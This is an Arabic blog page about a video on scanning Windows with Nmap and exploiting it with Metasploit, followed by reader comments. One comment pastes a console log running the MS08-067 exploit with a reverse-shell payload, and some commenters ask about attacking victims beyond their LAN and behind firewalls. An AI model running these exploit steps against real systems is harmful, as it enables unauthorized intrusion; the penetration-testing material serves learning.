فيديو: اختراق نظام ويندوز باستخدام Nmap و Metasploit
تقيمك :فيديو يشرح استخدام أداة Nmap لفحص المنافذ الموجودة بالجهاز وتحديد نوع النظام وكيفية استغلال احدى الثغرات الموجودة في مشروع ميتاسبلويت لاختراق نظام ويندوز عن بعد في مدة لا تزيد عن 5 دقائق.
شرح الفيديو:
عن الكاتب:
عبدالمهيمن الآغا, مختص بالحماية وأساليب إختبار الإختراق. أملك خبرة في إدارة الشبكات والسيرفرات, تطوير المواقع والبرمجة بلغة Ruby التي برمجت بها عدّة مشاريع وأدوات مفتوحة المصدر.

مختبر إختراق من الأردن أحب كل ما يتعلق بأمن المعلومات ، أساهم في كتابة العديد من المقالات والتحديات في مُجتمع iSecur1ty ، أحب البرمجة بلغة python ولدي خبره في إدارة السيرفرات وبناء الأنظمة.
التعليقات
Zaid
29 يوليو، 2009 الساعة 3:19 مشرح اكثر من رائع
طبعا مشروع الميتاسبلويت اكثر من رائع و الـmeterpreter اروع D:
و منتظرين جديدك
عبدالمجيد العتيبي
29 يوليو، 2009 الساعة 3:42 ماهنيك على الشرح الذيذ
دمت بود
L!nuxawi
29 يوليو، 2009 الساعة 4:27 مألف شكر أخوي عبدالمهيمن ,,, موضوع و شرح أكثر من رائع
“” أتمنى الإهتمام بجانب السيكيورتي و تأمين نظام اللينكس من جهه مستخدم سطح المكتب “”
جبروت هكر
29 يوليو، 2009 الساعة 8:38 صالسلام عليكم ورحمة الله
اهنيك والله على الموضوع المميز
أستمر .. !
موفقين
الرآيق
29 يوليو، 2009 الساعة 12:08 مالسلام عليكم
يعطيك العافيـه يا خوي على هذ الشرح
فعلاً اداة Nmap ممتاز في كشف المنافذ المفتوحه في الجهاز
pal
29 يوليو، 2009 الساعة 12:52 ميعطيك العافية على درس جميل
لاكن عندي سؤال طريقة تنجح فقط على شبكة داخلية
Mustafa Albazy
30 يوليو، 2009 الساعة 6:02 مشرح بسيط جداً وجميل, ولكن ليس جميع الثغرات الموجودة يمكن تنفيذها البعض يمكن تنفيذها على جهاز احمد وعلى جهاز احمد لايمكن وهنا يأتي دور اختلاف نسخة الويندوز والتحديثات المركبة على النظام.
@ pal
لاكن عندي سؤال طريقة تنجح فقط على شبكة داخلية
تنفع على شبكات WAN/LAN
عبدالمهيمن
30 يوليو، 2009 الساعة 7:34 ملأكون صريح معكم لم أجرب استغلال ثغرة خارج الشبكة المحلية لكني بنفس الوقت لا أجد ما يمنع استغلال الثغرة عن طريق الانترنت اذا توفرت الشروط التالية:
1. IP حقيقي للجهاز أي أننا نستطيع الوصول للجهاز والاتصال معه بشكل مباشر.
2. عدم وجود أنظمة حماية أو IDS يمنع استغالال الثغرة بشكل صحيح فكما نعلم في الانترنت اتصالنا يمر بعدة سيرفرات.. اذا وجد نظام حماية على سيرفر واحد فقط هذا سيؤدي لعدم استغلال الثغرة.
@Syntax: بصراحة لم أكن أتصور أنه سيحتاج كل هذا الوقت.. كل ثانية أقول الآن سيعمل والآن سيظهر سطر الأوامر… حتى انتهت الـ 40 ثانية P: على كل حال لاتقلق ضغطت الفيديو بشكل جيد وأنقصت من دقته قليلا فحجمه لايزيد عن 10 ميغا.
Syntax
30 يوليو، 2009 الساعة 7:40 صبارك الله فيك وزادك علم 🙂
لو قمت بعمل Pause للتصوير خلال تحميل الميتا , كنت ستوفر بعض الثواني 🙂
جزاك الله خير , دمت بود ,,,
Dz-Security
31 يوليو، 2009 الساعة 8:51 مسوالي: هل التطبيق كان على جهاز وهمي او جهاز داخل شبكتك او جهاز مستهدف او غير ذلك ؟
و شكرا لك على الموضوع =)
مروان
1 أغسطس، 2009 الساعة 6:14 مالفيديو تم على جهاز وهمي و في الاعدادات يتصل بالشبكة “bridged” او “accés par pont
يعني الروتر يظن انه جهاز موجود فيزيائيا و لكنه وهمي
Mustafa Albazy
1 أغسطس، 2009 الساعة 2:34 صراجع الفيديو مرة اخرى, التطبيق تم على جهاز وهمي بواسطة الفرتوال بوكس.
sabri
2 أغسطس، 2009 الساعة 12:35 ميعطيك العافيـه يا خوي على هذ الشرح
t4h3r
7 أغسطس، 2009 الساعة 11:22 صشرح هايل ومبسط جداً
بس انا عندى مشكلة لما بكتب
Nmap -0 192.168.16.70 مثلاً
النتيجة اللى بتظهر هى دى
مع العلم ان الاى بى ده موجود وشغال فى الشبكه معايا
عبدالمهيمن
25 أغسطس، 2009 الساعة 4:11 مفي الشرح أنا أفترض أني أقوم بـ Penetration Testing وقبل أن أصل لمرحلة تطبيق الثغرات قمت بعملية جمع المعلومات وفحصت نطاق الشبكة باستخدام Nmap وعرفت الأنظمة الموجودة, اصداراتها والمنافذ المفتوحة فيها. ثم بدأت بتطبيق الثغرات واستخدمت Nmap مرة أخرى في بداية الفيديو لأظهر كيف عرفت اصدار نظام التشغيل عن بعد, أتمنى أن تكون الصورة وضحت الآن…
ICEMAN
25 أغسطس، 2009 الساعة 9:18 صهاي عبدو
ال ip اللي انت كتبته بسرعة من غير ماتبحث عنة
اي انه وين عرفت هذا ال ip اللي طبقت عليه الشرح مع العلم اني اعلم
مثل ماتكول بالشرح انه للنظام الوهمي
كيف عرفت ip النظام الوهمي يعني انت تعرفه مسبقا ام هناك اوامر تمكننا من البحث عن ال ip في الشبكة وشكرا على الموضوع
عبد العزيز حسن
27 أغسطس، 2009 الساعة 6:26 صيا جماعه هي الفديوهات ممسوحه ولا هي المشكله عندي
…..
انا مفيش ولا فديو شغال عندي
ZEZO
30 أغسطس، 2009 الساعة 1:23 مبارك الله فيك ياأخى
وانا مازلت مبتدىء فى عالم الشبكات والامان وحلمى ان اصبح محقق جرائم الكترونية ان شاء الله ( مع العلم انى مهندس اتصالات )
ورمضان مبارك على الجميع
sherif
21 سبتمبر، 2009 الساعة 1:55 مالسلام عليكم .. أولاً شكراً على الشرح الرائع.. ثانياً عندي سؤال: سيرفر يعمل ب Microsoft IIS أردت تطبيق بعض ثغرات الميتاسبلويت عليه لكنه يخرج لي رسالة Target not found فوجدت أنه يستخدم سيرفر Squid فهل يوجد طريقة لتخطي ذلك البروكسي؟
عبدالمهيمن
22 سبتمبر، 2009 الساعة 4:57 ماذا لم تكن تستطيع الاتصال المباشر بالنظام الذي تريد تنفيذ الثغرات عليه فلن تتمكن من استغلال الثغرات وتنفيذه بشكل صحيح.
عبد العزيز
4 نوفمبر، 2009 الساعة 2:23 صيعطيك العافية اخوي فعلا بطل في شرحك
وفكرتك اكثر من رــأإئـعة تسلم ايديك عليها
بالتوفيق يا غالي
احمد العتيبي
18 نوفمبر، 2009 الساعة 5:00 مطبعا الاستغلالات تختلف من باي لود لباي لود اخر
انا ودي انك تشرح مجموعة من الباي لودات
ويكون من ظمنها
windows/dawnload_exec
S4udi h4ck
18 ديسمبر، 2009 الساعة 1:29 ملاهنت اخوي ابي الاوامر اين اجدها .؟ البرنامج موجود بس الاوامر لاهنت مهي بموجوده اين اجدها
اخوك خالد
njm@hotmail.com
glal
23 ديسمبر، 2009 الساعة 1:57 ملقد ارسلت لك تعليقا عن شيء بخصوص الميتاسبلوت بمدونتك لا اريد طرحه هنا مره اخري حتي لا تمل مني …ارجو الرد علي هنا او هناك
اريد اضافه شيء- بدأ فعلا هذا الموقع في التقدم والانتشار وبذلك علي ايدي محترفين امثالكم ارجو المحافظه علي التقدم وتحقيق تقدم اكثر
شكراا
redbyte
5 فبراير، 2010 الساعة 9:20 مارجو المساعد في حل هذه المشكلة
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD generic/shell_reverse_tcp
PAYLOAD => generic/shell_reverse_tcp
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.247
RHOST => 192.168.1.247
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 3 – lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Triggering the vulnerability…
[*] Exploit completed, but no session was created.
مع العلم اني وضعت ال LHOST
ستعمل الكثير من الثغرات ولكن جميعها نفس الخطاء
[*] Exploit completed, but no session was created.
شو اعمل؟؟؟؟
وشكرا الك ع الشروحات الحلوة
mohamed
7 مارس، 2010 الساعة 4:18 صانا مشكلتي نفس مشكلة الاخ الي قبلي مع اني فاتح بورت في الفايروال 4444
ودي اسكرين برينت للمشكلة
http://yfrog.com/10screenshotkuwp
mohamed
8 مارس، 2010 الساعة 2:41 صانا جربت اكتر من ثغرة ونفس الناتج ممكن حد يعرفني المشكلة
http://yfrog.com/10screenshotkuwp
aqm
22 مارس، 2010 الساعة 10:57 مالسلام عليكم ..
اخ عبد المهيمن ..شكرا ع الشرح الاكثر من رائع ولكن لدي مشكله عند التطبيق
استخدم الثغره : windows/smb/ms08_067_netapi
والبايلود : windows/meterpreter/bind_tcp
لكن بعد ماكتب الامر exploit
يطلع لي هذا الخطـــأ
[*] Started bind handler
[-] Exploit failed: The connection timed out (192.168.1.2:445).
[*] Exploit completed, but no session was created.
علما بأني استخدم ابنتو 8:10 ومركب عليها ادوات الباك تراك
ارجوا المســــاعده منكـــم
عبدالمهيمن
25 مارس، 2010 الساعة 5:18 مثغرة ms08_067_netapi اكتشفت في عام 2008 ونحن في عام 2010 يعني محتمل جداً أن يكون مستخدم الجهاز قام بتركيب التحديثات الأمنية كما أنها موجودة في خدمة SMB لمشاركة الملفات التي يجب أن تكون مفعّلة ليتم استغلال الثغرة بشكل صحيح.
البعض يخطئ في استخدام ميتاسبلويت ويظن أنه أداة تمكّنه من اختراق أي جهاز لكن المشروع لم يبرمج لتخترق به الأجهزة بل ليستخدم لفحص الشبكات من الاجهزة المصابة بالثغرات.
تحياتي للجميع.
aqm
25 مارس، 2010 الساعة 6:16 ممستخدم الجهاز الاخر .. هو انا
جهازي الاخر (للتجارب ) هو ويندوز xp SP2
والبورت 445 مفتوح … بس مشكلتي مع هذا الخـــــطأ
Exploit completed, but no session was created
عبدالمهيمن
25 مارس، 2010 الساعة 6:27 مالسبب هو رسالة الخطاً: The connection timed out
المشروع لم يتمكن من الاتصال مع الجهاز الآخر اما بسبب اعدادات الشبكة أو بسبب الفايروول أو لأن خدمة مشاركة الملفات غير مفعّلة.
aqm
25 مارس، 2010 الساعة 6:53 ممشكور عبد المهيمن ..
بس كيف اعرف حل لهذه المشكله ..؟؟
mohamed
30 مارس، 2010 الساعة 11:16 مازلت الميتاسبلويت ثم اعدت تثبيته فأصبح يظهر لي عند تشغيل البرنامج ” [*] Configuring multi-user permissions for first run… ” و لا يفتح الموقع أو الكونصول
ما الحل ؟ ( تركتها لمدة طويلة لكن لم يحدث شيئ )
aqm
4 أبريل، 2010 الساعة 11:12 مالسلام عليكم …
تحدثت عن مشكلتي من قبل … الا وهي
Exploit completed, but no session was created
ولاحظت ان هذا الخطا يظهر عندما يكون جدار الحمايه في ويندوز no
اما اذا كان جدار الحمايه في الويندوز off مايظهر لي هذا الخطا واستطيع اختراق الجهاز ..
🙂
زلكن هل يوجد حل ..استطيع اختراق الويندوز وجدار الحمايه on ؟؟؟
ارجوا الرد
mester omis
12 أبريل، 2010 الساعة 2:37 مالسلام عليكم و رحمة الله و بركاته
ممكن رابط تحميل الادات الNmap
و دمتم مشكورين
HACKER_CH
21 أبريل، 2010 الساعة 12:02 صمشكورا اخي عبد المهيمن و تحياتي لك بارك الله فيك على الشرح اﻷكثر من رائع
بالنسبة لﻷخ لي طلب مساعدة تحميل NMAP
الموقع الرسمى اخي هنا
http://nmap.org/
و فيه العديد من البرامج اﻷخرة الرائعة
سلام
كما يمكنك تحميلها من سطر اﻷورامر
rpm -vhU http://nmap.org/dist/nmap-5.21-1.i386.rpm
rpm -vhU http://nmap.org/dist/zenmap-5.21-1.noarch.rpm
عامر
9 يوليو، 2010 الساعة 2:35 متشكر يا اخي
5 اشهر من الميتا استطعت اختراق جهاز الوهمي لاكن جهاز اخر يبدو لي مستحيل
بعض الاحيان اظن ان الميتا فاشل في الاختراق
ابوعبدالله
13 سبتمبر، 2010 الساعة 7:48 ماخي عبدالمهيمن سؤالي هل metasploit شتغل في بيئة windows7 ؟ واذا كان الجواب نعم ياليت رابط التحميل
أحمد العنترى
14 سبتمبر، 2010 الساعة 12:52 صنعم metasploit تعمل فى بيئة ويندوز 7
هاهو رابط التحميل :
http://www.metasploit.com/releases/framework-3.4.1.exe
ابوعبدالله
14 سبتمبر، 2010 الساعة 8:00 ممشكور اخوي عبدالمهيمن .. طيب ياليت تكتب لي امر تشغيل الميتاسبلويت على بيئة الوندز لاني طبفتها بس للاسف لم تعمل لدي ياليت تتحملني قليلا وتكتب لي هلامر واهم اوامرها ومتاسف الازعاج
عبدالمهيمن الآغا
18 سبتمبر، 2010 الساعة 10:24 مأخي أنا لا أستخدم ميتاسبلويت على ويندوز ولا أنصح بذلك أيضاً.. إستخدمها داخل بيئة وهمية مثل Virtual Box أفضل من الاصدار الخاص بويندوز.
بخصوص المشكلة التي واجهتك جرب تشغل المشروع بصلاحيات Administrator.. من الزر الأيمن Run as
ابوعبدالله
18 سبتمبر، 2010 الساعة 1:21 مأخي عبدالمهيمن انا حاولت كثير فتح metasploit بس للاسف لايعمل المشروع لدي مع اني انتظر كثيرا وتطلع لي هذه الرساله في بداية التشغيل
configuring multi-user permissions for first run
this application “must” be launched as an administrator the first time
press enter to exit ياليت تقول لي ماهي المشكله وفقك الله
Warrior-Tunesie
6 ديسمبر، 2010 الساعة 3:55 صسؤالي بسيط بعض الشيء
هل لاختراق جهاز على الشبكة يجب ان يكون البورت 445 مفتوح او هناك ثغرات لا تستوجب ان يكون هذا البورت مفتوح في جهاز الضحية
2 هل من الممكن ان تعمل هذه الطريقة على اي جهاز آخر و اذا كان نعم هل الطريقة هي بوضع ip الضحية مكان ip المحلي الذي وضعناه في الشرح
Warrior-Tunesie
6 ديسمبر، 2010 الساعة 11:38 صرجاء هل يوجد من يستطيع الرد على سؤالي
Swith
29 يونيو، 2012 الساعة 7:49 صالسلام عليكم,
لقد قمت بإنشاء منتدى رائع و أتشرف بدعوتك للإلتحاق بمنتداي و التسجيل فيه.
المنتدى على هذا الرابط http://swithteem.yoo7.com/
محمد
21 سبتمبر، 2014 الساعة 2:50 صانا مجرد مبتدأ انا حملت حزمة الكالي لينكس واريد البدأ من الصفر فمها هي الخطوات التمهيدية للقيام بالامر من فتح بورتات الى غير ذالك .. ملحوظة الشبكه ال انا عليها صاحب الشبكه عامل ماك على الوحده بمعنى اني لا اقدر اعدل فيها او افتح بورتات خاصه بها كل ال اقدر اعمله فتح بورتات في جدار الناري للنسخة وايضا في ال vmware وايضا في الكالي هل هذا يكفي ام انه لا بد من فتحها ايضا في الوحده او (الراوتر الخاص بي ) حتى استطيع استعمال الكالي في اي امر سواء اختراق او تحليل او غيرة ؟